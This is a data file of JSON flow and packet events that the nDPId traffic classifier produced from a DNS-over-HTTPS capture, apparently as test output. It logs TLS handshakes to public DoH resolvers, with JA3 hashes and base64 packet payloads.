00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739311335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311335,"pkt":"REREREREZmZmZmZmCABFAAFF8W5AAL0G+HQKAAABCQkJCso6Abuxr7nkL4f0JVAYAfbUBgAAFgMBARgBAAEUAwN330DAziY7Qy75ow2vvPPweI0WjrfNmIygzjgDJAOaiiBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AICW+8u6SZcrHjrKSceEpWhhd\/sXKRaui0Qq2OMNRWOwf"}
00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946739311357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739311357,"pkt":"ZmZmZmZmRERERERECABFAAXUEqtAADsGVKoJCQkKCgAAAQG7yjovh\/Qlsa+7AVAQAHdneAAAFgMDAHoCAAB2AwPsHFeUVovCXmWpA4VyNoqF1JeqKqRwRROYqOPJU94DoSBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3hMCAAAuACsAAgMEADMAJAAdACBGm95D7Gx83XoeinRk1rxGpZA8u1buvy6HtAvs0UM2ZxQDAwABARcDAwAgBCGr5NOssVZ7TUX4BrL7MyB6aRLwiu1feUb2m7o8fLYXAwMKaD942IoOSpCliO6ZHVfN+ruurWUvz7jYgeJjK7SV5aPdpOPU+gCK34wDZjZp50dMaIsg77NAx4MrmJU6wTsTAwZldztvUMpws2wEYMHKWN686r\/ZugmuzBYB3tOPhjCMvk8pBO5Z4lVJQc9Hb1RsJ03QnqO\/EjZsCDIJr3EwAdBfauIjY3hi6AzlRf9VL9JoUREwghpYtzQDH4RvKScS6ISuIZ0qtqLTaSpG1rQC+HJZ6KKhTxZKSTcym6aIqvAR7ZiyINnXnDnxtWbl8cRiOiDv8PdDsr+5E5xwhcf6QYoUCBscXYYl1EwqfCWZLU9EdSEHvyBTgkaNAt3XMqrEl7x4wjZ94SWxkiQsQ3IyHj5ooHHdJLNgfAhAZ1sF3MqWOMepm6yBmJwKpSpxHS0\/\/oYNPpH+52R4vidTCtKs7UfIN9SKrOu0JFbGVqc8M5lplCXOQx4+S48+BecP0sGtTkcShvyBVSAANiwxQTDnS7JinVgGYtRwWjEqrWQJJopko6YuGLn+wkhYZkogv\/onHZtE4hlsg01xAHJ9PxQYxWbOdVfS1w0JvhE5EDMILwTMYm\/YfzaRcfZnN3X3c8PldLUC8Q00rxaePA+7a5mbMlVzZ\/ZKqlpmGHRhU3G\/b+Za7F3XZpTKcWJ\/+pP4OAaUaey+j0NOSrl7D3\/HeWq7P0vSd\/KYIm9oS0ZJvLtsffCfxTm2zwDcPGhRfKW16iadTUvmoczzCHSYvw+n8hl61iMBIgJerq\/CN9KkicrNEfU8QCR9bMF1D3CABgNImMdCKODlAcrpb\/Ya\/cQUwfP\/CWuVsZ3s+sh12SEW9JLfAgHTnuYwcMjbvAf2Fgpb\/+WmXCT93+A3gLKANXIVA2PfvntvndGO4gXYEiHaUhu4qZSsHkkcQJ5rwvJrE4CSJC\/fp+te7FlAxBXZxU3peCLLIMzIhccFKuqNX9+cPYxqAzm+f4FDsJg5KvH5AIh6Nda\/JBKZzhlz2omWzUxsNRCyzYkCR\/6xx8emByUElOOQjp3\/HRm+WaL5aZHnOk2myD86PdWR0IdZibdlJEHJ2\/GXJsQQv95dhA35hvgjWHiQLe0QLkAtPzosLXULXc5d7ytqMATetgFrOl+B+IuaEJAtm5NdT9m+\/Uo1nl\/TbvSaNp5EaxK2DPhV7Vt+vxmsBj23m0aDhv8PPgUfy9wK\/Niqob3bOD6oQrofsTggzpDg\/0PeQx+LRnGU46v4ljhYI4JoQY+cJBFQKWNeFww9uy1s8SJhz9LzcLFv+j30Vt+r4FFm8AZfzHX3wSuBELuShY7dZHSjQzxqOJfeGLr5ThoXw5ldv54ifSY52Lfxp8BkElu7BDDbf4F6XdVR3aRKy8Yk7ooQevFc0GOsxn7jXeMuFiaf9M\/MspabzWIKD5sTaMPvexVqQrSIhAE01MVqTa8zAs1n4D9AszPAZaArvvaw1dpUAGCn22YGrLkylRxMCN07\/HyOXir6cpxUbsvRgSag8LgIuYbY\/Ta1KZ2trDeXprvYofOqOqX\/ep4LHzQHiCFm14LvDzSoMa4qqUdxfJfOjiZQVsJdT+2uThs188toZRMoZsziXxP++fZpO4m\/wGTJ13ciJYHkQjnaWtFJW9KHR4pPyXX3T1W5XcomUZpNi+tnQlSKiXPl02KPyhw0qdY8Z0WoKV536f3wtH00HuTa3UIk1hZxDmxFcYOKvSwc"}
00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946739311358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1616,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1616,"pkt_l4_len":1582,"thread_ts_msec":946739311358,"pkt":"ZmZmZmZmRERERERECABFAAZCEqxAADsGVDsJCQkKCgAAAQG7yjovh\/nRsa+7AVAYAHfZAwAA1xiWPE9sRZ+HRED66TQP2BK\/H\/\/55yXpchOqptSfdmizDwWdekTWC4fynK8Z2sZPt7VLeiJJja8C3BQX9Rz0xZnn1eoThbbJA0Ru7pA+5J7tyanMo4IQcPUIBSO5p49Bymfzm29G5qjErMG7mQ0OPPjTCRaB\/UjgjbKvSEcd8\/qlBT71ZfI4uv2myCBr7kstCCXPIR18CKF+Z2\/VrH6vxRdx\/DMaAsMgc41PzNU7xNOukRDZxOR62YLQKe5TOm9eGAE6qQfGiWVQuBPTBNCMLbyMtxxnLWSXpHUM8lAFCuaK7Kc6QBacccBEf2G6WUxZTWFo3b0bLTLXGsaAdMgEEvX57cRGL6Gq8YWmgloFc0L4YPSBPg4QXqG2603cgV+j6PlTHv6e2HefSTdXdeLXiPRCN345+9Y7w0ERX6leOOccKhVG5SuGrnMow7zmCn7a2KZDo6IK6nPbbrDUtvAROe\/2qAE2VCX9KID9EijWEziQ9XCbVPjeL02DA\/rYN7wYXRiJgCIeBs3cXR7OygqBY2+3+XFzo9TaLSJOjL2D0foR73wSCVhYWptmpzwaIHjhZCo4rI5hdLdI5wijBOAwhmr7WRW8Yv8AQsnvt1Z4coLNvTRubKzb6tX\/Oxf2jOtE8ql46ReYSM8F\/WAKChrNRMIbb1FxJ7q10gZXMDttRcPXX\/qGmHUzaGCJmbtVGS68jgVwThCO60XMMu84lvsX\/Ppf9SgVkWGycwU0+7rBExjec94Gk2PRYtyBh7FtK\/ojKF2Zx1IbH4Ped7sLfGR4i7sMPLWNn+T5wJpId2IpurmzQEup+Wmo7GS+GCV0scp4nxOFT1awumcjwSZT8bYpF93Gq1VRsPaw1Ed8OHX5e5gmoY4MVzie+NT9SEgMn6ichQsu5snHAMbc8\/IWQxw1j4WN38V6zcIh4u4V1Gd7SkhAHeYNQaHO8zyvvE8ImQNU3iYNHLIKvw9jrqWUBqp23GQnf3jir7+jnbT6O6iTPLexjWoZTCF\/FtolEJ0e895tZWyhQDvFKtQE5PBsOvi7\/BalOF7pvRKDn\/re0ni0oWgQPdEaU+LIaPzCC8LkWYd5oE27150iJxzh1Gp8SiKQXDLhLhi579hHj1+ols2JqJH8RdJfR0+VmnJeuW7LLf+BRMSJBXoQCCLgwxC7f\/h7fFu2xKC0W6c42fJZaQRckgm7zcULCvbrdB3\/7TiSzFX4IqscHoIIazQksB3SnhTuJmLtEq0s5iQGUGxfhlMGhmMgzukQ6S3xziGVGLlkCIIbeLTBQrX9TXDN8S1GsZEFqBjMPt\/N1zN3ViQ2J2at2dPSgSFskYDCKI7W279fwmbZs7V8tsMKdl7zI9bVkSm8TK+VOCU7uRHndZTCFD0rVG1nulq\/L99PnlHGAGXK\/CqGETUVVLlDxaOxEAgpjONuItzxylFN2ddXgvj3hTCiDE8O0ZeY5HxF3kaLieLFjiKlcFdLwH+yoWIasdZ5ETRJVqr26OzVYBTCPTfSgbwHD0EdFC3v31MUjg04ocQ4ZiFf7dRFVtWmOWN0r2SpHXy2xEBvMuqeP3vQyXuuz6g6Dn7YZmJY0+sx4Fy9C8oBJAE0ZwKxguZmJv1GeQHP6tU\/veMnBxdJr3tx5OgYDk+909nj4a5TD3cRR1pqKY8PwvBnQ1a7o21Mx6az\/nj775\/EQh2soovj6zthqPP\/vtXFBBG3tG\/sEPeFuYX44cpRhz5K3N4JqP6Lp6W3KZYJ1EwmXdPWiQcbK\/K0dzC4LCmApJnMsipnxLFAxIsyZnv1pRKdZtp6E4ZNkwItTRiePKudtegvLH1+qbg3pXvAj\/AueIMUCY+nZ2bEiLI67RcDAwBgsXSJyFgjJRWpsUIwFa+B3HudQHKrExr60U8JLlKkL\/P\/S+PEy7whFdA90+7WJF1F8DCmOjyvxxrrWdZx35m5pHvRkiSavCeWDYlRzcWBeiUF0TAz0e0CdFpMI0nfm+C5FwMDAEXIcqRX1+3I4YBN1ZyTwBh\/\/IzIU5lJHrJKAnGrUu2ocpCQI2eEwS+zVK0zKk1o2WUWMhhsV2wCrUmzne3qZHF1rWYeRVk="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739311566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311566,"pkt":"REREREREZmZmZmZmCABFAAFFTLFAAL0GMYcKAAABuYbEN9gaAbsU0wRrjALq7FAYAfY\/sgAAFgMBARgBAAEUAwN53D+IdbyKMqUcdChlG3BH1byG6PSts1pdzll38jdueyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIASid2tq+mdmASZBUTGU5iyt2F1JUvrNCp22BxrDleoO"}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946739311603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311603,"pkt":"ZmZmZmZmRERERERECABFAAuAg39AADQGeX65hsQ3CgAAAQG72BqMAursFNMFiFAQAfVJ7QAAFgMDAHoCAAB2AwNkY5ffptLk\/1RQxoHPHysW3r9+0ddQo4Z3YjqxuStqKyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhxMCAAAuACsAAgMEADMAJAAdACDs3oZu6oN3lGaq4ly6\/hAqFwB\/djty35eYhaI2Lxe7SRQDAwABARcDAwAgv82VBnjlaTkDEuDhSukFo4HH4nI6fax\/zFPW2XozJ0kXAwMOr9L3WKPFCRevhqaVGoGS+x\/kXxxMckfNoOqk04UOi2nffzkls4dz\/6PwTgD2O+tiYezNJxr\/6WpHVX82B1TCh5LVuQtfmobZqrhUuztxfuDnZpjdtqBFN8\/ThU4OUKCLhdBohaEJUJaODtpSPbvHLMo+XUoovzoT0\/zM8eQTXQpCXzBBMJx7xHTAsbkvGn3C+AG5zWAlrqlt8rw8cJvpcKk420r2AjCbqQCcOhIk9fgtrE6sGQpDmvb1eDYkMJL0ZWhtJpArnw4DJbVlN2eqshODC2oEeU4LRs6HxumiPK1q9BAYm9j4B\/VQvljlxD1l2D54nI0XTtCqzYVH05VeNSyKwY99P0gfk5KbNuwMkg76KjoZ0pANDmDoK2O7MRcalHkbOzBtmCZzhD7k0YW7eqNkMU5wTjhw6\/SKqF25gZNB9Nt6RXkKo6zhp67SL4jpzGRuSRzfeNfXwE70s6GkDEHT87ePp0CPZwkccES0koYuFCUJ8ZPaF51CsuO3hEK6HLj90BijpqZSqxhfc1mm\/yqD3lLZlsT6EnUdCBK75PQ4LqFtNj1aZVWZmY0bISdBsjTgcU\/azUhlVpbtuwFzbRgeZMjYItDFV3G2Mz1lBTIG8+EI15TAfiX3THktTEDNdXWRIKZWc6CdSZSTQj5epKSMIDeZ3ym23Y5D0uYv2rRWwF77WpaBXG+MUxbpeWleGLZxmojsUrhsTN3K\/SO4YTnIH3mEDcbuEL\/C6kXZUUc3JKUkSmGmNO61dgMehbma4fB8llee+ia3ZxrMWwvGiTS2tpm78Rjdk2lVGQ4Kw0Hv16lr+xG8BLc4CMV63wU9gsM8SvlR14rXUIcZ1w1IVKRMCPj5\/ktzqCSdsd7JLAu6iqnF+tffAp0R7hABno4kl79WtkvKmhCxs2C9rHaxhWuglRBec9Q1dOU4n\/q5s3oTaT0MWOiB9FA9hPVkcr5rHO5WTaUTZCO3f07agWWupUC0SrT4kMq2F7GC\/qyJUokz54psYmDyksoYU5W4XunHAPWif32UI8qTU8ZnD9BGfH74hn454rDYVO6L7CccMxZlmp851erV6hvxeQE4QFic5+4T+9IQsqcHez2OFejw6vdevdAwPVqE+KjL4UP+MGf4lbUn4WzekrRNg4+OLWhqMW5jPxgVFLL1X\/7LXlyiUW3FZsQlx3wHUnrfnXgRsgIdVSezz4HY0222o0JjMjRIsMAML27omWMbFkL1GH9F5whlSmkQo7tR4pkO8ZObYU6gN63eRur2pr9yUb6mdaHxKmoMOtTc07t4c0mmYRPcKvUuGEq\/qFZAib\/Cn9qtJSED+KsOJFP3lcOvHyBWmDkPTuXhIirjxvNRHlhpCinnvq51BRLv0iIYtLa4+FWzOnZxdtRmb+J7gXcYqMUZr8f9hSbjcXpRs0qTCNkn\/vEFebnj0Oa5wWQ\/wyYqcIXbH0+Qg2t4MHCtt5puUCcnWiddPmXVCEbusxDhj1mW7Wb7s7TbeMJNHqJK2wkpexuwL1VqKOcMpKkVK63qTpeBRS7pKr42\/e4RAue3aCNMwXb2qN+nhV\/yAs+no2\/T8CA38S+A3XjJrTp3nRj3b7uYGTvq6vgcySIveyFsNVxbpOrMNJwA55r7OmJm\/TMMYu1Cmm7ApgsYESAyvVbBcTmlsCXf4kc5\/PCSNGVGXc3ry7HZ6UrNLiBxVinlqk+M5YS+nDMxRpBRZ\/l5jocQH\/hTpYeDeBYM6nlOI3a42ojQOf0qu\/s3tJK0pVMQq+L3fiObQL0w0ki8zB\/Pq94eJzcgGDCpDBI5rSkrXqKSKwE\/TPxGGb4EW3iPF5GMaLLk69BANjmbdOWrRbmSOZIerFLKML4S4ISArr9z\/Hd6jn9grfPQF5QPRgsy72snzNYK+cdD78EVK3JLSsYYqn88MbAXaWnvt\/NrtPJL0QXd+HGti75Czr60Z2exrtdLfvuyhP6EA\/OJF74UO1DMZkdkO4dBy70z4Gu4gpkQ7cqPDY0GZ19ZQkhDdIe6tY\/KPM4UldVfU5Ox+v3aicLwXXKsL1aYiIDMExLQqDr8Vp6Rg8MhQd15RVUWWezyYpN93w5RckR2WthYnNZNsPa7iVvEbmCiUoUkbzt39o4APEG2T8nb60w4QPGzL8Bs+6zqpdT6PPZQOoSFcrit36uSRZP8iGT1fW72Vs+Zxy5GcZuta5oSW5oky8Ru7NnhXKgfldlxRBIOjtCyzFizIawHPWtdb1FNijZyZVKdj4BP0ocR0b5RYPeWT1DhR9qwqhFmLRHqWhBkA5vK7BpYSEPmeNp9JvF8mc9PzqPXFx4qv46sa0RB9Om1TkSniqOmaKfC0VJ55FKEd3mCSVa1mQ2nzlNyLUC\/G6NFqNfA87dMc8kmjkPDW9L4TPuUdk6cFk2SWFMlOT4UEAqyKhiuK9S2TSwt8uFOPCTdi2gCXoEJdX+9z6vM3zP1D618aG60X5Ut6n4\/mqqX3ZYS740az2d1czqYB7kjzMa99L4RSKw9Nv7MMuwMNSxkhAXISg5MWpacHw\/KAdEQ1nUyITpRoICmtn4wFkGI6VHWSC4OZg5gMWs1Z3587N6CIw3eN5rLnfYJ5l6ZBNqLnr+ciVip8x2IDHWDGTGr5OC+uJxAOEMiK+fcS0il3LgKzbRTF6C8+Y0IWjT3NlBZzIZBcCE3FjrijIv+69vNs6VJAKOlSW3f43x0FPmVvFyGHd0hZ6go7pV\/2O1uABkUwtp9Jfvr8prX7E0NzIH8AuTCtktrwjOAvCJu4CHVfpkaygbTIxPH5m45oyD64MuKPbsc5SlgZwhfZunmTwVDMaVpXGfayrmusZgZ\/07zHxvKOvoAfTCZXoYameOeAqJlNLuCW2W26TogT5fb\/9WF1j5kVLVJW3+Xr3WsDu87Z6wA7xpdVjSQWvWXCJ9y6jEXbNwmvXmeHALYBp+DdvlGU6uIsmqv2tJETpbTRkgR+f7Dhm8aD8084eT\/a67jbRGqTJcyCWp8HFxcSFdtdPKZoErFiYrC7xPgwqW36MeKC3pPi5nT9yuHbuL7yiKV4x9J1dDJBmuStOS8bPFHHOamsDufj+1xHeCKIDfJN+meXy0zdvw70PEKqqZXmCwfi2TfqRVP7d77vAzcphP1F9+RnUlovNNUieiBKgaaaLwfIEAiD84YhuItQrVIeJCa0jqOgMbgEKi1twm5DKS0bcizlDtDFNkFvRAghS6l8H5MMzc8ps2oVnq34RHWoVdxAXCkHDkkmpkGwGKoEP+YEVOArEfXlh0taA60GiWgLXrspKhJVAnjFiuxV1QiMjD4R5UbJ+BnJTGXsaH\/yPppjwU5bzpYvq1TPW2pdHuooLQ3rQ5gXMFPVeJEv4l3u9D\/o1MxYmTHF6ag0Pg7EYa9IiJh8NJsAWlNoM+jz3\/neEdRD31BwTKccVefTs8giAaZY3hKJ1XXe6Hys7XZMAJR72EIr5DA0qa2euR8ERpA8eew\/h0vqG8NScpvxxA8Cdjmhn\/JwaSSF9ubglNVw4f\/Z3JUgBYq3\/\/+9aFTg5SP56AY5voL2goU8TTHIbBp4JfOUmUTToGPy4GEqVcJNDAs6V2L7PobZ6srGT2l40lZacD46Db+MrlADUrWNBC6GAGEaOIzjsVXO2C7zOXrZPBi"}
00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02347{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946739311604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739311604,"pkt":"ZmZmZmZmRERERERECABFAAWWg4FAADQGf2a5hsQ3CgAAAQG72BqMAvZEFNMFiFAYAfXAzwAArcpCfmGLOKjDkyzsTe+IPkiqYnruzR41MPuGsz88MQqvC3a9HfwXJ6lzqQ4rCWJcWhWOM\/faQczL\/u4LUA47B+3hgIraXqwM7U0QtAPKeofLhsqBn12DazruSHbiIbxy+mEUG3S56+4ZRbB44U5cKRW56AecOVegPdxq19WX7WP4+ZvrOsXSvkcqGqyY6l57+wMNGtK9Hor0ODYeWdBnCWx+J55Yp1BLeNHq9nHIKHj0qCJNcTpuSY3kcxYIKgCzUqmtnXdoJ0GIMlbY2ljKsarNr5cWoMUbBujc0flI7F15VAzRku1eV3Kl\/7Wukzg8w4HiH6xnnC2hyeJ\/S9kg8k3Thktb0MRLph1xkAte3QZc08opc3Fwo1Ft6aRVOUnBzMc2ygQi4cXDCHwkiaI53r8gMzkS7anbEcS4yQcROtN4r2sH3n\/Y2Qw1v5Gb+U\/+RFg8+P9ZzSoFBkttBuC7bMKkuFovtwfD7bmTraXz2TwXRpY3Ao54+\/SNvuV3GwVsY67MLueBEgpQWATGxrbkACZtD4C+lpPBC5\/54MNyZi6y2\/bINiwBN2SHIdC0sG5gR\/DV19ykdqXF3pfYHlmfR3703pqTCdiZz1zhoMZLCPXVwnRt08WzrSf9AJPIVrVED87vfcSxcnSNe9\/uUQ+fPjNxmvMBL8ur1shycxG8A4cFPyuqBeBuBrfVjZFKQN3\/5iT\/qY3bW5kYmBDrHkL2xegzf\/Moa8towjQGmRBeDyc9Fogbi4Bl2lSDI\/x3VZI\/8yRCU0YCrn33V5Yytpt4Nri5jL3CrvqNUKuK49C6RMwZ1n1NkjUcpjeYGCGRXo6SbIn8CHVjiCEwFZ8FbQctAnWvdqfTpT0bXGelftgC9CQThu\/W+ybRqQdwN+K5c2QiXPYvO4kT3LD6oCwacJ4x3t9XRv3AXxYa1UbtXwad0Q5XC17E9XVpbbgKhrlco595yY5V6j1HdG8AkTRI1DXbEp3foy5yEjtW0o9bfHyhwUqC6TBXcyz4z4cHmh5p6A6BMpnvPJtMyGOVMKQ7LtCwwAKXNWcMVkLjSAZ+IrhMtGXoEFJcdmyQxTOI+OfCfdgm6q9yTer0lySMXu3yBMcL6Vn1SuMzS2FSE1aXKAyCBb3XF5Tfnf2rLe4r3hkWTr8Mmu\/+5cpIK1r4NWR0zq6iT\/lnsbxmS39yt3YHMSpG1r36HYatyCzF6kZo6KyW2UJ6fBqDVBmGD6CXSVAKejLC8pL1qmuOu2eXU804WhkOIkczZMz7pQW6C0A+bVJsEuL5Kd7KV\/W2IGcqNMtuMkFf1vHE4VTHRAmWpIDFt5I4ja4qA9N7tAzSWPkgtQseSnNvTrX+nCc0rsjLviAcYafijP+ATzRDOBcDAwEZYz205aORxNiMwaiQeObwk59GyoJ+T+YW4iSATpt8cc0OU+XkwulympL8b+KCt76fJXCt3rgEOglVp2lJQDaaCL0\/EDry33zbH0MtKm5P5nEWpzvQFhaXV1WeS3oS65S\/3UVJT7\/Hm\/AkB6N0iCgWEeK4i80RHGCYRIweyu9kQIUklvy2RlmccKeVQTq37O+\/HqRcQLsrpTkATqOJMvj0MaZ7zkYReeTUbtUUtzasEHVGtHimiktW2DAjF2G7BrMbQnAbkBNJMIcDNYwAwDUJvD2+j752nnR\/ojUHAoRsnlpRRGw8k7CJ0b0wBSknElPWssxoC\/r5K7w37x9u118AdMWjqtzSlF2uDe2PtsgCUxjOE7EkCZxpOWsXAwMARUyGMct3ItX2QiSoGAs2qAHwCi9mgPaAr45Z5ZYVR5NUAg5k1dXUDUazzqq9GbzXT1\/7OFi8y8eMdJWfTGFw9qor9xL6ew=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
